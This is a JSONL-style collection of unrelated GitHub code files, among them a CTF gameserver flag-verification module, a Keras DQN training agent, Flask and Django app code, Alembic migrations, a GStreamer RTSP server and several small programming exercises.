InvalidFlagFormat(FlagVerificationError):\n \"\"\"\n Flag does not match the expected format.\n \"\"\"\n\n\nclass InvalidFlagMAC(FlagVerificationError):\n \"\"\"\n MAC does not match with configured secret.\n \"\"\"\n\n\nclass FlagExpired(FlagVerificationError):\n \"\"\"\n Flag is already expired.\n \"\"\"\n","repo_name":"fausecteam/faustctf-2022-admincrashboard","sub_path":"venv/lib/python3.10/site-packages/ctf_gameserver/lib/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10271129289","text":"'''https://keras.io/examples/rl/deep_q_network_breakout/'''\nimport time\nimport tensorflow.keras as keras\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils.replay_buffer import ReplayBuffer\nfrom utils.models import Models\nimport logger\n\n\nclass Agent():\n \"\"\"A class representation of an agent using a DQN to solve different atari learning tasks.\"\"\"\n\n def __init__(self, env, model, model_target, epsilon):\n self.env = env\n self.num_actions = self.env.action_space.n\n self.model = model\n self.model_target = model_target\n self.epsilon = epsilon\n logger.create_logger(\"logs\")\n self.frame_count = 0\n\n def train(self,\n max_memory_length,\n batch_size,\n gamma,\n learning_rate,\n max_episode_steps,\n max_episodes,\n max_frames,\n epsilon_random_frames,\n epsilon_greedy_frames,\n update_after_actions,\n update_target_network,\n save_model_steps,\n save_model_path,\n ddqn\n ):\n \"\"\"Method for learning a dqn or double dqn\n\n Parameters\n ----------\n max_memory_length: int\n Max memory size for replay buffer\n\n batch_size: int\n batch size for sampling experience replay data before performing a gradient update\n\n gamma: float\n discount factor gamma for controlling the importance of future rewards\n\n learning_rate: float\n learning_rate of optimizer\n\n max_episode_steps: int\n maximum number of steps per episode\n\n max_episodes: int\n maximum number of episode per training\n\n\n epsilon_random_frames: float\n Number of first n random frames before acting greedily\n\n epsilon_greedy_frames: float\n Number of greedy frames after random frames\n\n update_after_actions: int\n Number for controlling after how many actions an update\n should occure ( like in original dqn paper )\n\n update_target_network: int\n Number of passed frames after which one has to update the target network\n\n save_model_steps: int\n Number of steps between saving a model\n\n save_model_path: String\n Path for saving a model\n\n ddqn: bool\n boolean for whether to train with or without double dqn for reducing overestimation\n \"\"\"\n\n optimizer, running_reward, episode_reward_history,\\\n memory, loss_function = initialize_training(\n learning_rate, max_memory_length)\n\n accum_timesteps = 0\n logger.log_action_meanings([\"NOOP\", \"FIRE\", \"RIGHT\", \"LEFT\"])\n\n for episode_count in range(0, max_episodes):\n\n losses = []\n state = np.array(self.env.reset())\n episode_reward = 0\n actions_episode = []\n rewards = []\n curr_probs = []\n #import time\n # time.sleep(1)\n # self.env.render()\n if memory.buffer_count >= 1000 and episode_count % 5 == 0:\n states, _, _, _, _ = memory.sample(800)\n print(\"STATE SHAPES\", states.shape)\n predicted_dists = np.array(self.model.predict(states))\n\n logger.log_experiment_random_states(random_state_samples=states, predicted_dists=predicted_dists,\n obs_min=[-1, -1], obs_max=[-1, -1], 
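
A self-contained round-trip sketch of the flag scheme in flag.py above: pack the protected fields, MAC them by prepending the key to SHA3-256 (Keccak needs no HMAC construction, as the comment there notes), base64-encode, then check with compare_digest. The field layout, 9-byte MAC, and 15-byte DATA_LEN follow the snippet; the secret is invented:

import base64
import hashlib
import struct
import time
from hmac import compare_digest

SECRET = b"example-secret"           # invented demo key

def mac(data):
    h = hashlib.sha3_256()
    h.update(SECRET)
    h.update(data)
    return h.digest()[:9]            # MAC_LEN

protected = struct.pack("!i H c", int(time.time()) + 900, 7, bytes([3]))
protected += b"\x00" * 8             # zeroed 8-byte payload for the demo
flag = "FLAG_" + base64.b64encode(protected + mac(protected)).decode("ascii")

raw = base64.b64decode(flag[len("FLAG_"):])
assert compare_digest(mac(raw[:15]), raw[15:])   # DATA_LEN = 4 + 2 + 1 + 8
print(flag)
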
episode_count=episode_count, state_meanings=[], image_data=True, apply_softmax=True)\n\n for t in range(0, max_episode_steps):\n self.frame_count += 1\n # print(state.shape)\n # print(np.max(state*255))\n # plt.imsave(\"test{}.png\".format(t),arr=state*255)\n random = True\n if self.frame_count < epsilon_random_frames or self.epsilon > np.random.rand(1)[0]:\n action = np.random.choice(self.num_actions)\n else:\n action = self.select_action_greedily(state)\n random = False\n actions_episode.append(action)\n\n # FOR LOGGING\n state_tensor = tf.convert_to_tensor(state)\n state_tensor = tf.expand_dims(state_tensor, 0)\n action_probs = self.model.predict(state_tensor)\n # print(\"ACTION PROBS:\", action_probs,\n # \"ACTION PROBS AFTER:\", action_probs[0])\n logger.log_action_probs(\n action_probs[0], episode_count, t, apply_softmax=True)\n curr_probs.append(logger.softmax(action_probs[0]))\n # print(\"SOFTMAXED PROBS\", logger.softmax(action_probs[0]))\n\n weights = self.model.weights[-2].numpy()\n #print(\"Weights:\", weights[-2].numpy().shape)\n logger.log_weights(weight_tensor=weights,\n step=t, episode_count=episode_count)\n #####\n\n self.decay_epsilon(epsilon_greedy_frames)\n state_next, reward, done, _ = self.env.step(action)\n rewards.append(reward)\n\n episode_reward += reward\n # tf.summary.scalar(\"random\", data=random, step=self.frame_count)\n # tf.summary.scalar(\"reward\", data=reward, step=self.frame_count)\n # tf.summary.scalar(\"action\", data=action, step=self.frame_count)\n\n # tf.summary.image(name=\"episode{}\".format(\n # episode_count), data=tf.expand_dims(state, 0), step=t)\n logger.log_frame(\n frame=state, episode_count=episode_count, step=t)\n logger.log_custom_timestep_scalar(\n reward, t, episode_count, 'reward')\n logger.log_custom_timestep_scalar(\n action, t, episode_count, 'action')\n logger.log_custom_timestep_scalar(\n random, t, episode_count, 'random')\n memory.add(action, state, state_next, done, reward)\n\n state = np.array(state_next)\n\n if self.frame_count % update_after_actions == 0 and memory.__len__() > batch_size:\n loss = self.train_step(\n memory, batch_size, ddqn, gamma, loss_function, optimizer, episode_count, t)\n losses.append(loss)\n\n if self.frame_count % update_target_network == 0:\n self.model_target.set_weights(self.model.get_weights())\n\n if self.frame_count % save_model_steps == 0:\n Models.save_model(self.model, save_model_path)\n\n if done:\n logger.log_episode_return(\n episode_return=episode_reward, episode_count=episode_count)\n logger.log_action_distribution(\n np.array(actions_episode), episode_count)\n logger.log_custom_distribution(\n np.array(rewards), 'reward_distribution', episode_count)\n if episode_count >= 1:\n logger.log_action_divergence(\n curr_probs, probs_old, episode_count)\n probs_old = curr_probs\n curr_probs = []\n if len(losses) != 0:\n loss_avg = np.mean(losses)\n logger.log_custom_episode_scalar(\n loss_avg, episode_count, 'loss')\n losses = []\n accum_timesteps += t\n print(\"EPISODE\", episode_count, \"DONE WITH RETURN:\",\n episode_reward, \"AND #STEPS:\", t, \"OVERALL STEPS:\", accum_timesteps)\n break\n\n # tf.summary.scalar(\"episode_reward\",\n # data=episode_reward, step=episode_count)\n episode_reward_history.append(episode_reward)\n if len(episode_reward_history) > 100:\n del episode_reward_history[:1]\n running_reward = np.mean(episode_reward_history)\n\n if running_reward > 40: # Condition to consider the task solved\n print(\"Solved at episode {}!\".format(episode_count))\n break\n if 
self.frame_count >= max_frames:\n                print(\"Max frames completed\")\n                break\n\n    def train_step(self, memory, batch_size, ddqn, gamma, loss_function, optimizer, episode_count, t):\n        \"\"\"Method for a training step that updates the weights of the model\n\n        Parameters\n        ----------\n        memory: ReplayBuffer\n            the ReplayBuffer used for sampling\n\n        batch_size: int\n            Sampling Batch Size\n        ddqn: bool\n            variable for deciding whether to use DDQN or vanilla DQN\n        gamma: float\n            discount factor\n        loss_function: keras.losses.Huber\n            loss function for updating gradients\n        optimizer: keras.optimizers.Adam\n            optimizer\n        \"\"\"\n        state_sample, state_next_sample, rewards_sample, action_sample, \\\n            done_sample = memory.sample(batch_size)\n\n        if ddqn:\n            qs_next_model = self.model(state_next_sample)\n\n            argmax_qs_next = tf.argmax(qs_next_model, axis=-1)\n            next_action_mask = tf.one_hot(argmax_qs_next,\n                                          self.num_actions, on_value=1., off_value=0.)\n\n            qs_next_target = self.model_target(state_next_sample)\n\n            # tf.summary.scalar(\"Q Value estimates\", data=np.mean(\n            # qs_next_target), step=self.frame_count)\n\n            # use qs_next_target here; qs_next is only defined in the vanilla-DQN branch below\n            logger.log_custom_timestep_scalar(\n                np.mean(qs_next_target), t, episode_count, 'q_vals_avg')\n\n            masked_qs_next = tf.reduce_sum(tf.multiply(next_action_mask,\n                                                       qs_next_target), axis=-1)\n\n            target = rewards_sample + \\\n                (1. - done_sample) * gamma * masked_qs_next\n\n        else:\n\n            qs_next = self.model_target.predict(\n                state_next_sample)\n\n            # tf.summary.scalar(\"Q Value estimates\", data=np.mean(\n            # qs_next), step=self.frame_count)\n            logger.log_custom_timestep_scalar(\n                np.mean(qs_next), t, episode_count, 'q_vals_avg')\n\n            max_qs_next = tf.reduce_max(qs_next, axis=-1)\n\n            target = rewards_sample + (1.-done_sample) * gamma * \\\n                max_qs_next\n\n        with tf.GradientTape() as tape:\n            qs_curr = self.model(state_sample)\n            masks = tf.one_hot(\n                action_sample, self.num_actions, on_value=1., off_value=0.)\n            masked_qs = tf.multiply(qs_curr, masks)\n\n            masked_qs = tf.reduce_sum(masked_qs, axis=-1)\n            loss = loss_function(target, masked_qs)\n\n        grads = tape.gradient(\n            loss, self.model.trainable_variables)\n        optimizer.apply_gradients(\n            zip(grads, self.model.trainable_variables))\n        return loss\n\n    def test(self, max_episodes, max_episode_steps, render):\n        \"\"\"Method for testing a dqn model\n\n        Parameters\n        ----------\n        max_episode_steps: int\n            maximum number of steps per episode\n\n        max_episodes: int\n            maximum number of episodes per test run\n        render: bool\n            indicator whether to render or not\n        \"\"\"\n        episode_rewards = []\n        for episode_count in range(0, max_episodes):\n            state = np.array(self.env.reset())\n            episode_reward = 0\n\n            for t in range(0, max_episode_steps):\n                # frame_img = self.env.render(mode=\"rgb_array\")\n                # plt.imsave(\"frames/frame{}.png\".format(t), frame_img)\n                if render:\n                    self.env.render()\n                    time.sleep(0.05)\n\n                self.frame_count += 1\n\n                random = True\n                if np.random.rand(1)[0] < 0.05:\n                    action = np.random.choice(self.num_actions)\n                else:\n                    action = self.select_action_greedily(state)\n                    random = False\n\n                tf.summary.scalar(\"random\", data=random, step=self.frame_count)\n\n                state_next, reward, done, _ = self.env.step(action)\n                state_next = np.array(state_next)\n\n                episode_reward += reward\n                tf.summary.scalar(\"reward\", data=reward, step=self.frame_count)\n                tf.summary.scalar(\"action\", data=action, step=self.frame_count)\n                tf.summary.image(name=\"episode{}\".format(\n                    episode_count), data=tf.expand_dims(state, 0), step=t)\n\n                state = state_next\n\n                if done:\n                    time.sleep(3)\n                    break\n\n            
tf.summary.scalar(\"episode_reward\",\n data=episode_reward, step=episode_count)\n episode_rewards.append(episode_reward)\n print(\"END OF TESTING AFTER {} EPISODES WITH AVG PERFORMANCE OF {} PER EPISODE \".format(\n episode_count, np.mean(episode_rewards)))\n\n def select_action_greedily(self, state):\n \"\"\"Return an action greedily based on current dqn predictions\n\n Parameters\n ----------\n state: np.array\n The current state\n\n Returns\n -------\n action: int\n one of the possible actions but selected greedily based on current dqn preds\n \"\"\"\n state_tensor = tf.convert_to_tensor(state)\n state_tensor = tf.expand_dims(state_tensor, 0)\n action_probs = self.model(state_tensor, training=False)\n\n action = tf.argmax(action_probs[0].numpy())\n\n return action\n\n def decay_epsilon(self, epsilon_greedy_frames):\n \"\"\"Decays epsilon based on number of greedy frames\"\"\"\n epsilon_interval = 1.0 - 0.1 # epsilon_max - epsilon_min\n self.epsilon -= epsilon_interval/epsilon_greedy_frames\n self.epsilon = max(self.epsilon, 0.1) # epsilon_min is 0.1\n\n\ndef initialize_training(learning_rate, max_memory_length):\n \"\"\"Initialize training variables\n\n Parameters\n ----------\n learning_rate: float\n The learning rate for the optimizer\n max_memory_length: int\n The maximal size of the replay buffer\n\n Returns\n -------\n optimizer: keras.otptimizers.Adam\n an initialised optimizer\n running_reward: int\n the initial running reward\n memory: ReplayBuffer\n the initial replay buffer memory\n episode_reward_history: list\n the initial history of episode rewards for solving the task\n loss_function: keras.losses.Huber\n the initialised loss function\n \"\"\"\n\n optimizer = keras.optimizers.Adam(\n learning_rate=learning_rate, clipnorm=1.0)\n\n running_reward = 0\n\n memory = ReplayBuffer(max_memory_length)\n episode_reward_history = []\n\n loss_function = keras.losses.Huber()\n\n return optimizer, running_reward, episode_reward_history, memory, loss_function\n","repo_name":"masirt/drlvis","sub_path":"examples/dqn/utils/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":15262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22714480177","text":"# https://www.facebook.com/brus.espinal/videos/1993841287403618/UzpfSTEwMDAwMzMzMjk5NDIwNzoyNTk1MjEwMTMwNDk2NzE4/?multi_permalinks=2598626893488375¬if_id=1546049249480967¬if_t=group_highlights\n\nfrom turtle import *\n\nbrus = Turtle()\nbrus.speed(10)\nbrus.shape(\"triangle\")\nbgcolor(\"black\")\nbrus.color(\"Lime Green\") \nbrus.pensize(2)\n\ndef estrella():\n for i in range(5):\n brus.forward(40)\n brus.right(144)\n\nbrus.penup()\nbrus.goto(-20, 315)\nbrus.pendown()\nestrella()\n\nbrus.penup()\nbrus.goto(0, 300)\nbrus.pendown()\n\nx = 10\ny = 270\nfor c in range(14):\n brus.goto(-x, y)\n brus.goto(x, y)\n x = x + 20\n y = y - 20\n\nbrus.penup()\nbrus.goto(0, -10)\nbrus.pendown()\nbrus.pensize(10)\nbrus.goto(0, -100) # loc of trunck\n\nbrus.penup()\nbrus.goto(0, -200)\n\nbrus.color(\"Red\")\nbrus.write(\"Merry Christmas\", False, \"center\", font=(\"Merry Christmas Flake\", 50))\n\nbrus.hideturtle()\ndone()\n","repo_name":"j3ffyang/ai","sub_path":"scripts/basic/christmastree.py","file_name":"christmastree.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24415442678","text":"\"\"\"empty message\n\nRevision ID: d574a6089401\nRevises: \nCreate Date: 2022-08-24 
21:34:59.224103\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd574a6089401'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint('student_course_student_id_fkey', 'student_course', type_='foreignkey')\n    op.create_foreign_key(None, 'student_course', 'student', ['student_id'], ['id'], ondelete='CASCADE')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_constraint(None, 'student_course', type_='foreignkey')\n    op.create_foreign_key('student_course_student_id_fkey', 'student_course', 'student', ['student_id'], ['id'])\n    # ### end Alembic commands ###\n","repo_name":"sanyadrian/SQL_Project","sub_path":"src/db/migrations/versions/d574a6089401_.py","file_name":"d574a6089401_.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33806321265","text":"import sys\n\nif __name__ == \"__main__\":\n    l = []\n    n = int(input())\n    for i in range(n):\n        name = input()\n        marks = float(input())\n        l.append([name, marks])\n\n    l.sort(key=lambda x: x[1])\n    # print(l)\n    m = l[0][1]\n    mi = 1000\n    nl = []\n    for name, marks in l:\n        if marks > m and marks <= mi:\n            mi = marks\n            nl.append(name)\n\n    nl.sort()\n    for i in nl:\n        print(i)\n","repo_name":"hgarg1010/hacker_rank_python","sub_path":"Nested_list.py","file_name":"Nested_list.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7381993964","text":"\ndef quick_sort(integers):\n    \"\"\"Perform a quick sort on a list of integers: select a pivot\n    point, partition all elements into a first and second part while\n    looping so all elements < pivot are in the first part and any elements\n    > pivot are in the second part, then recursively sort both halves\n    and combine.\n    \"\"\"\n    integers_clone = list(integers)\n\n    def helper(arr, first, last):\n        \"\"\"Quick sort helper method for finding pivot/split points in list.\"\"\"\n        if first < last:\n            split = partition(arr, first, last)\n\n            helper(arr, first, split - 1)\n            helper(arr, split + 1, last)\n\n    def partition(arr, first, last):\n        \"\"\"Generate a partition point for the given array.\"\"\"\n        pivot_value = arr[first]\n\n        left = first + 1\n        right = last\n\n        done = False\n        while not done:\n            while left <= right and arr[left] <= pivot_value:\n                left += 1\n\n            while arr[right] >= pivot_value and right >= left:\n                right -= 1\n\n            if right < left:\n                done = True\n            else:\n                temp = arr[left]\n                arr[left] = arr[right]\n                arr[right] = temp\n\n        temp = arr[first]\n        arr[first] = arr[right]\n        arr[right] = temp\n\n        return right\n\n    helper(integers_clone, 0, len(integers_clone) - 1)\n    return integers_clone\n\n\nINPUT_VALUE = [5, 1, 3, 2, 1, 5, 7, 8, 10, 2]\nprint(quick_sort(INPUT_VALUE))","repo_name":"therk987/Artificial-Association-Networks","sub_path":"dataset/code/codeclone/sort/data/train/quick/quick_128.py","file_name":"quick_128.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20101035064","text":"from setuptools import setup, find_packages\nimport pathlib\n\nhere = pathlib.Path(__file__).parent.resolve()\n\nlong_description = (here / 'README.md').read_text(encoding='utf-8')\n\nsetup(\n    
name='splitcli',\n    version='0.2.0',\n    description='Use Split.io from the command line',\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    url='https://github.com/splitio-examples/splitcli',\n    author='Henry Jewkes & Talia Nassi & Micah Silverman',\n    author_email='info@split.io',\n    classifiers=[\n        'Development Status :: 3 - Alpha',\n        'Intended Audience :: Developers',\n        'Topic :: Software Development',\n        'License :: OSI Approved :: Apache Software License',\n        'Programming Language :: Python :: 3.6',\n        'Programming Language :: Python :: 3.7',\n        'Programming Language :: Python :: 3.8',\n        'Programming Language :: Python :: 3.9',\n        'Programming Language :: Python :: 3 :: Only',\n    ],\n    keywords='development, split, feature flags',\n    packages=find_packages(),\n    python_requires='>=3.6, <4',\n    install_requires=['requests', 'python-inquirer', 'art', 'inquirer'],\n    extras_require={\n        'dev': ['check-manifest'],\n        'test': ['coverage'],\n    },\n    entry_points={\n        'console_scripts': [\n            'splitcli=splitcli.__main__:main',\n        ],\n    },\n    project_urls={\n        'Bug Reports': 'https://github.com/splitio-examples/splitcli/issues',\n        'Source': 'https://github.com/splitio-examples/splitcli',\n    },\n)\n","repo_name":"splitio-examples/splitcli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"72"} +{"seq_id":"17355155611","text":"import datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\nBase = automap_base()\nBase.prepare(engine, reflect=True)\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\nsession = Session(engine)\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef welcome():\n    return (\n        f\"Welcome to the Hawaii Climate Analysis API!<br/>\"\n        f\"Available Routes:<br/>\"\n        f\"/api/v1.0/precipitation<br/>\"\n        f\"/api/v1.0/stations<br/>\"\n        f\"/api/v1.0/tobs<br/>\"\n        f\"/api/v1.0/temp/start/end\"\n    )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n    prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n    results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n    precip = {date: prcp for date, prcp in results}\n    return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n    # list the station ids; np.ravel flattens the result rows so jsonify can serialize them\n    stations = session.query(Station.station).all()\n    return jsonify(list(np.ravel(stations)))\n\n@app.route(\"/api/v1.0/tobs\")\ndef temp_monthly():\n    # the filter must be chained onto the query and executed with .all()\n    results = session.query(Measurement.tobs).filter(Measurement.station == 'USC00519397').all()\n    return jsonify(list(np.ravel(results)))\n\n@app.route(\"/api/v1.0/temp/<start>\")\n@app.route(\"/api/v1.0/temp/<start>/<end>\")\ndef stats(start=None, end=None):\n    # compute min/avg/max together; chain the filters onto the query and execute with .all()\n    sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n    if end is None:\n        results = session.query(*sel).filter(Measurement.date >= start).all()\n        return jsonify(list(np.ravel(results)))\n\n    results = session.query(*sel).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n    return jsonify(list(np.ravel(results)))\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"Shockman1000/Unit-10","sub_path":"import datetime as dt.py","file_name":"import datetime as dt.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18511258520","text":"###############################################################################\n# To run on Ubuntu 22.04, need to install:\n# sudo apt install gir1.2-gst-rtsp-server-1.0\n# Ref: https://stackoverflow.com/questions/52634893/importerror-cannot-import-name-gstrtspserver-introspection-typelib-not-found\n###############################################################################\n\nimport gi\ngi.require_version('Gst', '1.0')\ngi.require_version('GstVideo', '1.0')\ngi.require_version('GstRtspServer', '1.0')\nfrom gi.repository import GLib, Gst, GstRtspServer\n\nGst.init(None)\n\nmainloop = GLib.MainLoop()\nserver = GstRtspServer.RTSPServer()\nmounts = server.get_mount_points()\n\nfactory = GstRtspServer.RTSPMediaFactory()\nfactory.set_launch('(v4l2src device=/dev/video0 ! videoconvert ! x264enc speed-preset=ultrafast tune=zerolatency ! 
rtph264pay name=pay0 pt=96 )')\n\nmounts.add_factory('/test', factory)\n\nserver.attach(None)\n\nprint ('Streaming at rtsp://127.0.0.1:8554/test')\nmainloop.run()","repo_name":"digitallyamar/gst-basics","sub_path":"rtsp_server.py","file_name":"rtsp_server.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7155797341","text":"#!/usr/bin/python3\n\"\"\"\n2-matrix_divided module\n\"\"\"\n\n\ndef matrix_divided(matrix, div):\n    \"\"\"\n    Divides all elements of matrix by div.\n    \"\"\"\n\n    if not all(isinstance(element, list) for element in matrix):\n        raise TypeError(\n            \"matrix must be a matrix (list of lists) of integers/floats\")\n\n    for element in matrix:\n        if not all(isinstance(value, (int, float)) for value in element):\n            raise TypeError(\n                \"matrix must be a matrix (list of lists) of integers/floats\")\n\n    for index in range(len(matrix)):\n        if index - 1 >= 0:\n            if len(matrix[index]) != len(matrix[index - 1]):\n                raise TypeError(\n                    \"Each row of the matrix must have the same size\")\n\n    if not isinstance(div, (int, float)):\n        raise TypeError(\"div must be a number\")\n\n    if div == 0:\n        raise ZeroDivisionError(\"division by zero\")\n\n    divided_matrix = []\n    for element in matrix:\n        divided_list = []\n        for value in element:\n            divided_list.append(round(value / div, 2))\n        divided_matrix.append(divided_list)\n    return divided_matrix\n","repo_name":"gorgyboy/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8078464738","text":"import collections\nimport argparse\nimport json\n\ndef post_process_voting(doc_scores, path, topk, test_df):\n    \"\"\"Generate the final prediction from the predictions inferred independently for each document, taking both logits and retrieval scores into account.\n\n    Args:\n        doc_scores (np.array): retrieval score per document\n        path (str): inference output directory\n        topk (int): top-k value controlling how many documents are retrieved\n        test_df (pd.DataFrame): test data DataFrame \n    \"\"\" \n    test_ids = test_df['id'].tolist()\n    nbest_prediction = collections.OrderedDict()\n    prediction = collections.OrderedDict()\n    \n    nbest_hubo = []\n    best_hubo = []\n    \n    for i in range(topk):\n        nbest_path = f'{path}/split_prediction/{i}_pred/nbest_predictions.json'\n        best_path = f'{path}/split_prediction/{i}_pred/predictions.json'\n        \n        with open(nbest_path, 'r') as json_file:\n            json_data = json.load(json_file)\n            nbest_hubo.append(json_data)\n        with open(best_path, 'r') as json_file:\n            json_data = json.load(json_file)\n            best_hubo.append(json_data)\n    \n\n    for i in range(len(test_ids)):\n        id = test_ids[i]\n        max_doc_num = None\n        max_logits = -200\n        \n        for j in range(topk):\n            pred = nbest_hubo[j][id][0]\n            score = (pred['start_logit'] + pred['end_logit'])\n            \n            if score < 0:\n                score = score * (1 - doc_scores[i][j])\n            else:\n                score = score * doc_scores[i][j]\n\n            \n            if max_logits <= score:\n                max_doc_num = j\n                max_logits = score\n        \n        nbest_prediction[id] = nbest_hubo[max_doc_num][id]\n        prediction[id] = best_hubo[max_doc_num][id]\n    \n    nbest_file = f'{path}/nbest_predictions.json'\n    best_file = f'{path}/predictions.json'\n    \n    with open(nbest_file, \"w\", encoding=\"utf-8\") as writer:\n        writer.write(\n            json.dumps(nbest_prediction, indent=4, ensure_ascii=False) + \"\\n\"\n        )\n    with open(best_file, \"w\", encoding=\"utf-8\") as writer:\n        
writer.write(\n json.dumps(prediction, indent=4, ensure_ascii=False) + \"\\n\"\n )\n","repo_name":"boostcampaitech5/level2_nlp_mrc-nlp-05","sub_path":"input/code/scores_voting.py","file_name":"scores_voting.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15127119979","text":"N, C, K = map(int, input().split())\r\nT = [int(input()) for i in range(N)]\r\nT.sort()\r\nanswer = 0\r\nwhile len(T) > 0:\r\n limit = T[0] + K\r\n counter = 0\r\n while counter < C:\r\n if len(T) == 0:\r\n break\r\n if T[0] > limit:\r\n break\r\n del T[0]\r\n counter += 1\r\n answer += 1\r\nprint(answer)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc011/A/4808218.py","file_name":"4808218.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"35695414118","text":"from django.conf.urls import url\nfrom django.urls import path, re_path\nfrom rest_framework import routers\n# from usuarios.api.usuario_actual import UserView\n# from usuarios.api.gestor_usuario import UserView as GestorUserView\nfrom usuarios import views\n\nrouter = routers.SimpleRouter()\n\n# router.register(r'api/usuario_actual', UserView, 'usuario_actual')\n# router.register(r'api/crear_usuario', GestorUserView, 'crear_usuario')\n# router.register(r'api/listar_intrumentos', InstrumentoView, 'listar_intrumentos')\n# router.register(r'api/listar_subdirecciones', SubdireccionView, 'listar_subdirecciones')\n# router.register(r'api/listar_agencias', AgenciaView, 'listar_agencias')\n\nurlpatterns = [\n url(r'^info/$', views.info),\n url(r'^register/$', views.register),\n url(r'^agregar/$', views.agregar),\n url(r'^eliminar/$', views.eliminar),\n path('getPerfiles//', views.getPerfiles),\n path('claveunica/', views.claveunica),\n path('login_with_hash/', views.login_with_hash),\n path('is_user/', views.is_user),\n path('change_modulos//', views.change_modulos),\n]\n\nurlpatterns += router.urls\n","repo_name":"cfingerh/secretariamodernizacion","sub_path":"satisfaccion/backend/usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3749181429","text":"\"\"\"added diner_id column in 'meals'\n\nRevision ID: cc4e8e5323af\nRevises: 8b9b35b2beeb\nCreate Date: 2019-01-30 10:49:26.552470\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cc4e8e5323af'\ndown_revision = '8b9b35b2beeb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('meals', sa.Column('diner_id', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_column('meals', 'diner_id')\n    # ### end Alembic commands ###\n","repo_name":"yuppiecruncher/Dinsforbins","sub_path":"dins/alembic/versions/cc4e8e5323af_added_diner_id_column_in_meals.py","file_name":"cc4e8e5323af_added_diner_id_column_in_meals.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38445097142","text":"# This is my solution for task which was discussed in\n# this video: https://www.youtube.com/watch?v=tOD6g7rF7NA\n# This task took about 1 hour to solve.\n\n# Our string is the first 31 digits of Pi\nmy_string = '3141592653589793238462643383279'\nmy_patterns = ['314', '49', '15926535897', '14', '9323',\n               '8462643383279', '4', '793']\n\n\ndef get(s, patterns):\n    # Sort patterns in descending order; we need to check\n    # the longest substrings first to find the solution\n    # with smallest number of whitespaces in result\n    patterns = sorted(patterns, key=len)[::-1]\n\n    for i, p in enumerate(patterns):\n        pos = s.find(p)\n\n        if pos >= 0:\n            # Remove the substring from string to make sure that different\n            # substrings will not intersect\n            s = ' '.join(s.split(p, 1))\n            ind = i  # remember the position of a pattern in array\n            # to check other patterns of smaller length\n\n            while ind < len(patterns) - 1:\n                collected = [(pos, p)]  # remember the substring and its global position\n                ind += 1\n\n                for p2 in patterns[ind:]:\n                    pos2 = s.find(p2)\n\n                    if pos2 >= 0:\n                        s = ' '.join(s.split(p2, 1))\n                        collected.append((pos2, p2))\n\n                # Check if the string still has any digits; if the string\n                # contains only white spaces - it means we found\n      